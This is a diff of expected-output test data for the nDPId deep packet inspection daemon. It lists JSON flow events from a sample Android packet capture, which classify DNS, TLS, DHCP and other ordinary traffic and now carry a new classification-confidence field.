+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Google","breed":"Acceptable","category":"System"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
